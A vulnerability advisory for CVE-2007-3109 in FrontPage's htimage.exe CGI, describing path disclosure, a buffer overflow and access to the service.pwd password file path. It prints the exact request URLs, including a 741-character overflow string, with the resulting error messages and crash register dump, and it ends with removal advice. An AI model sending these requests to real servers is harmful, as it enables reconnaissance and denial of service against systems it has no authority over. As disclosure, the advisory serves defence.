CERN Image Map Dispatcher

2007.06.11
Credit: h0tturk
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2007-3109
CWE: CWE-Other


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple buffer overflow 3) Allow us to access files. Problem #1 ~~~~~~~~~~ Like I said, the first bug gives us the full path to the root directory. I tested this vulnerability against some servers, all where vulnerable! Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926, 3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are vulnerable if we have premission to execute "htimage.exe" + If "htimage.exe" exist). To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory (it's installed by default) and premission to execute it. That's why only Windows is vulnerable, Unix based systems can't execute "*.exe" files. If we access "htimage.exe" using our favorite web browser like: http://server/cgi-bin/htimage.exe/linux?0,0 we get this error: ------------------------------------------------------------------------ --------- --- Error Error calling HTImage: Picture config file not found, tried the following: q:/hidden_directory_because_of_the_script_kiddies/webroot/linux /linux ------------------------------------------------------------------------ --------- --- Now we know that the path to the root directory is "q:/hidden_directory_because_of_the_script_kiddies/webroot/". Problem #2 ~~~~~~~~~~ Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and "FrontPage-PWS32". Tested / Vulnerable OS: Windows'95/98 "htimage.exe" buffer overflows if we access it like: http://server/cgi-bin/htimage.exe/<741 A's>?0,0. ------------------------------------------------------------------------ --------- --- HTIMAGE caused an invalid page fault in module <unknown> at 0000:41414141. Registers: 0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246 EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4 ECX=0054015c DS=013f ESI=005401a0 FS=3467 EDX=bff76648 ES=013f EDI=00540184 GS=0000 Bytes at CS:EIP: Stack dump: bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c ------------------------------------------------------------------------ --------- --- <Server still running> + <500 Server Error> First remote FrontPage exploit? Problem #3 ~~~~~~~~~~ It's not a serious bug. Using "htimage.exe" we can access files on server, but we can't read them. Accessing "htimage.exe" like: http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0 outputs: ------------------------------------------------------------------------ --------- --- Error Error calling HTImage: HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or 'polygon' (got an alphanumeric string) ------------------------------------------------------------------------ --------- --- NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden Solution ~~~~~~~~ 1) Remove "htimage.exe". 2) Do not use FrontPage, simple enough :)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top